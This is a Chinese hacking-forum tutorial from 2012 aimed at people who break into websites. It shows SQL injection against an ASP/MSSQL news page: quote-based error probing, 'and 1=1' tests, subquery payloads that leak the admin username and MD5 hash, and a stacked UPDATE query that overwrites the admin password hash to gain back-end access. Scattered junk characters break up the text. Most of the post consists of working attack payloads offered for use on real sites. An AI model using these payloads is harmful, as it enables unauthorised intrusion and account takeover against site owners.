经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
' |; M& v- A K; V& ^, h可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
! h% K, ]7 B6 P8 d/ E# a/ x测试如下:4 U/ c5 v" [( B9 a- H/ J# {0 b
http://www.tmdsb.com/news.asp?id=121
7 j0 B" m9 Q6 ? g在地址后输入单引号,显示
/ q9 v- y# S) Y( xMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’0 }2 Q& }2 U5 U1 r
字符串 ’’’ 之前有未闭合的引号
+ j# _+ K( M/ \8 Q$ \( A7 O/news/tmdws.asp,行63
' @( s: t a& ]4 ^, H/ y$ l* o% U' I说明没有过滤单引号且数据库是MSSQL.
& u" a7 N" u0 z3 S1 a" Uand 1=1正常。and 1=2出错。肯定存在注入
" C) B+ D) g8 C接着输入
F& g$ C' @; S, ?. @$ ]http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin); U J. h/ j2 t) I/ h( B
得到帐号为:admin, s0 _7 Q. s4 A: s0 {0 M/ f2 |
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
2 E7 X" A. z5 b4 k, b$ j得到密码为:a4716077c2ba075c
8 W% d$ u( c# `. m* A接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
2 k" ^: Y- ]0 z9 Y' d4 U/ B% j命令如下 :
8 V1 v, C- m$ V2 Z+ ?# Z0 T;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ J7 H F$ S: {1 `+ }6 }$ g这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41